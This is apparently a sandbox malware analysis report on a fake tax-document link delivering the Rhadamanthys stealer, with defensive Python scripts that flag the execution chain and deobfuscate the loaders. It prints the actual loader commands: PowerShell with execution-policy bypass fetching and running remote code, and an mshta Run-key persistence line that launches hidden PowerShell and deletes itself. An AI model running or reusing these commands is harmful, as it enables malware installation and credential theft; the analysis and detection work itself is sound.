Windows Analysis Report
https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf

Overview

General Information

Sample URL: https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf
Analysis ID: 1638776

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
AI detected suspicious Javascript
Blob-based file download detected
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)

  • System is w10x64_ra
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 3940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rundll32.exe (PID: 8140 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wscript.exe (PID: 5164 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • svchost.exe (PID: 2984 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RegSvcs.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • dllhost.exe (PID: 1480 cmdline: "C:\Windows\System32\dllhost.exe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • svchost.exe (PID: 7716 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 2708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
            • chrome.exe (PID: 7912 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9" MD5: E81F54E6C1129887AEA47E7D092680BF)
              • chrome.exe (PID: 4620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
            • msedge.exe (PID: 7464 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b" MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 2928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • RegSvcs.exe (PID: 7540 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
      • RegSvcs.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 1356 cmdline: dw20.exe -x -s 940 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • RegSvcs.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
      • RegSvcs.exe (PID: 7580 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 1156 cmdline: dw20.exe -x -s 936 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • MSBuild.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • dw20.exe (PID: 4000 cmdline: dw20.exe -x -s 680 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • MSBuild.exe (PID: 4816 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • dw20.exe (PID: 6028 cmdline: dw20.exe -x -s 816 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
  • elevation_service.exe (PID: 4972 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • elevation_service.exe (PID: 2784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • elevation_service.exe (PID: 3760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • elevation_service.exe (PID: 8140 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
  • notepad.exe (PID: 7928 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\user-PC-20250307-1017.log MD5: 27F71B12CB585541885A31BE22F61C83)
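The tree above is what the "Suspicious execution chain found" and "Uncommon Svchost Parent Process" signatures fire on: a script host launches PowerShell, PowerShell launches argument-less .NET utilities (RegSvcs.exe, MSBuild.exe), and those in turn spawn bare svchost.exe / dllhost.exe copies that go on to talk to the C2. The following is an added example, not Joe Sandbox code: it rebuilds the parent/child links from records constructed out of the report's own process tree (PIDs, parents and command lines as listed there, with the legitimate BITS service host kept as a negative control) and applies four parent/child rules of this example's own naming. It runs offline on the embedded records.

```python
"""Reconstruct the process tree above and flag the suspicious execution chain.

Added example, not Joe Sandbox code. PROCESSES is constructed from the report's
process tree (PIDs, parents and command lines as listed there); the rule names
and helper functions are this example's own.
"""
import ntpath
import re

# Constructed from the report: (pid, parent pid, command line).
PROCESSES = [
    (5164, 4100, r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js"'),
    (2324, 5164, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;'''),
    (1476, 2324, r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1'),
    (7536, 2324, r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    (2984, 7536, r'"C:\Windows\System32\svchost.exe"'),
    (7564, 2324, r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    (1480, 7564, r'"C:\Windows\System32\dllhost.exe"'),
    (7716, 1480, r'"C:\Windows\System32\svchost.exe"'),
    (7504, 2324, r'"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"'),
    (4000, 7504, r'dw20.exe -x -s 680'),
    # A normal service host from the same tree, kept as a negative control.
    (3940, 660, r'C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# .NET utilities that do nothing useful without arguments; a bare launch from
# PowerShell is the classic hollowing target (the report shows RegSvcs/MSBuild).
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}


def split_cmdline(cmdline):
    """Return (image basename, argument string) for a Windows command line."""
    if cmdline.startswith('"'):
        end = cmdline.index('"', 1)
        exe, args = cmdline[1:end], cmdline[end + 1:]
    else:
        exe, _, args = cmdline.partition(" ")
    return ntpath.basename(exe), args.strip()


def chain(by_pid, pid):
    """Image names from the outermost known ancestor down to pid."""
    names = []
    while pid in by_pid:
        ppid, cmd = by_pid[pid]
        names.append(split_cmdline(cmd)[0])
        pid = ppid
    return names[::-1]


def detect(processes):
    """Apply the parent/child rules; each finding carries the full ancestry."""
    by_pid = {pid: (ppid, cmd) for pid, ppid, cmd in processes}
    findings = []
    for pid, ppid, cmd in processes:
        name, args = split_cmdline(cmd)
        name = name.lower()
        parent = split_cmdline(by_pid[ppid][1])[0].lower() if ppid in by_pid else ""
        rules = []
        if parent in SCRIPT_HOSTS and name == "powershell.exe":
            rules.append("script_host_spawns_powershell")
        if parent == "powershell.exe" and name in DOTNET_UTILITIES and not args:
            rules.append("powershell_spawns_argless_dotnet_utility")
        if parent in DOTNET_UTILITIES and name in {"svchost.exe", "dllhost.exe"}:
            rules.append("dotnet_utility_spawns_system_process")
        # Real service hosts carry "-k <group>"; a bare svchost.exe is a hollowed
        # or impostor copy (the report's "Uncommon Svchost Parent Process" hit).
        if name == "svchost.exe" and not re.search(r"(^|\s)-k\s", args):
            rules.append("svchost_without_service_group")
        for rule in rules:
            findings.append({"rule": rule, "pid": pid,
                             "chain": " > ".join(chain(by_pid, pid))})
    return findings


if __name__ == "__main__":
    for f in detect(PROCESSES):
        print(f"{f['rule']:<42} pid={f['pid']:<5} {f['chain']}")
```

The ancestry string is the useful part for triage: for PID 7716 it reads WScript.exe > powershell.exe > RegSvcs.exe > dllhost.exe > svchost.exe, which is the path the C2 connections in the Networking section come from. The BITS service host (PID 3940) matches no rule because it carries a -k service group and has no scripted ancestor.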
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware and, as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
Source | Rule | Description | Author
00000016.00000002.1910501136.0000000005730000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000016.00000002.1892438127.0000000003503000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000016.00000002.1892438127.0000000003363000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000015.00000002.1902242469.0000000005640000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000022.00000003.1887780167.00000000031D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
(5 further matches are collapsed in the original report)

            System Summary

Source: Process started
Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5164, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, ProcessId: 2324, ProcessName: powershell.exe

Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ProcessId: 5164, ProcessName: wscript.exe

Source: Process started
Author: frack113
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5164, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, ProcessId: 2324, ProcessName: powershell.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zevUsecure104

Source: Network Connection
Author: bartblaze
Data: DestinationIp: 185.208.159.170, DestinationIsIpv6: false, DestinationPort: 2484, EventID: 3, Image: C:\Windows\SysWOW64\dllhost.exe, Initiated: true, ProcessId: 1480, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49775

Source: Registry Key set
Author: frack113, Florian Roth (Nextron Systems)
Data: Details: mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2324, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zevUsecure104

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7536, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2984, ProcessName: svchost.exe

Source: Process started
Author: Michael Haag
Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ProcessId: 5164, ProcessName: wscript.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5164, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;, ProcessId: 2324, ProcessName: powershell.exe

Source: Process started
Author: vburov
Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3940, ProcessName: svchost.exe
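Two of the Sigma hits above carry the loader strings themselves, and both hide their key words behind a layer of string indirection. The PowerShell command line never contains "iex": it builds the word at run time with the -f format operator ('{1}{0}' -f 'ex', 'I' evaluates to Iex) and invokes it with the call operator. The Run value zevUsecure104 is a registry-only launcher: mshta runs an inline javascript: URL whose strings live in two arrays (mww, rfc) and are only referenced by index, so that the Shell.Application ShellExecute call that starts powershell hidden (window style 0) and the FileSystemObject DeleteFile self-clean never appear as literals. The following is an added example, not Joe Sandbox code: it undoes both layers and pulls out the download URLs. The two inputs are copied verbatim from the Sigma hits; the function names and the rule logic are this example's own.

```python
"""Undo the two layers of string obfuscation in the loader commands quoted above.

Added example, not Joe Sandbox code. PS_CMDLINE and RUN_VALUE are copied from the
report's Sigma hits (powershell.exe command line, Run value zevUsecure104); the
helper names are this example's own.
"""
import re

PS_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6;'''

RUN_VALUE = r'''mshta "javascript:var mww = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://mrachnew12.blogspot.com/lilw.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], rfc = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], rjz = new ActiveXObject(mww[0]); rjz[mww[1]](mww[2], mww[3], mww[4], mww[5], mww[6]);close(); new ActiveXObject(rfc[0])[rfc[1]](WScript[rfc[2]]);"'''

URL_RE = r"https?://[^\s'\")|;]+"


def resolve_ps_format_operator(text):
    """Rewrite ('{1}{0}' -f 'ex', 'I') into the literal it builds ('Iex' here).
    The placeholders select argument indices, so the word only exists after
    formatting; a substring match for "iex" on the raw command line misses it."""
    pattern = re.compile(r"\(\s*'([^']*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)")

    def build(m):
        fmt, args = m.group(1), re.findall(r"'([^']*)'", m.group(2))
        return "'" + re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], fmt) + "'"

    return pattern.sub(build, text)


def analyze_powershell(cmdline):
    resolved = resolve_ps_format_operator(cmdline)
    return {
        "resolved": resolved,
        "execution_policy_bypass": bool(re.search(r"-e\w*\s+bypass\b", cmdline, re.I)),
        "invoke_expression": bool(re.search(r"\b(iex|invoke-expression)\b", resolved, re.I)),
        "remote_fetch": bool(re.search(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", resolved, re.I)),
        "urls": list(dict.fromkeys(re.findall(URL_RE, resolved))),
    }


def _read_list(src, start, close):
    """Parse a comma-separated list of quoted strings / integers that opens at
    src[start] and ends at the matching `close`.  Quotes are honoured, so the
    ']' characters inside the embedded PowerShell string do not end the array."""
    items, i = [], start + 1
    while i < len(src):
        c = src[i]
        if c in " \t\r\n,":
            i += 1
        elif c in "'\"":
            j = src.index(c, i + 1)          # the sample contains no escaped quotes
            items.append(src[i + 1:j])
            i = j + 1
        elif c.isdigit():
            j = i
            while j < len(src) and src[j].isdigit():
                j += 1
            items.append(int(src[i:j]))
            i = j
        elif c == close:
            return items, i + 1
        else:
            raise ValueError(f"unsupported token {c!r} at offset {i}")
    raise ValueError("unterminated list")


def collect_js_arrays(js):
    """Map every `name = [...]` array declaration to its parsed items."""
    arrays, consumed = {}, 0
    for m in re.finditer(r"\b(\w+)\s*=\s*\[", js):
        if m.start() < consumed:             # a '= [' inside a string already parsed
            continue
        arrays[m.group(1)], consumed = _read_list(js, m.end() - 1, "]")
    return arrays


def resolve_indexed_refs(js, arrays):
    """Replace name[idx] with the literal it points at (repr keeps the quotes)."""
    def pick(m):
        name, idx = m.group(1), int(m.group(2))
        if name in arrays and idx < len(arrays[name]):
            return repr(arrays[name][idx])
        return m.group(0)
    return re.sub(r"\b(\w+)\[(\d+)\]", pick, js)


def summarize_mshta_launcher(run_value):
    """Structured view of an mshta javascript: Run value after de-indirection."""
    js = run_value.split("javascript:", 1)[1]
    resolved = resolve_indexed_refs(js, collect_js_arrays(js))
    com = re.search(r"new ActiveXObject\('([^']+)'\)", resolved)
    call = re.search(r"'ShellExecute'\s*\]?\s*\(", resolved, re.I)
    args = _read_list(resolved, call.end() - 1, ")")[0] if call else []
    return {
        "com_object": com.group(1) if com else None,
        "program": args[0] if args else None,
        "arguments": args[1] if len(args) > 1 else None,
        "verb": args[3] if len(args) > 3 else None,
        "window_style": args[4] if len(args) > 4 else None,   # 0 = hidden window
        "self_delete": "'DeleteFile'" in resolved,
        "urls": list(dict.fromkeys(re.findall(URL_RE, resolved))),
    }


if __name__ == "__main__":
    print(analyze_powershell(PS_CMDLINE))
    print(summarize_mshta_launcher(RUN_VALUE))
```

Both stages resolve to the same shape: -ep Bypass, a fetch with irm from a blogspot.com URL, and the result piped into Invoke-Expression, which is what the "Bypasses PowerShell execution policy" and "Suspicious Powershell In Registry Run Keys" signatures describe. Matching on the resolved form rather than the raw string is the point; the raw command line passes a naive "iex" substring check.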
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
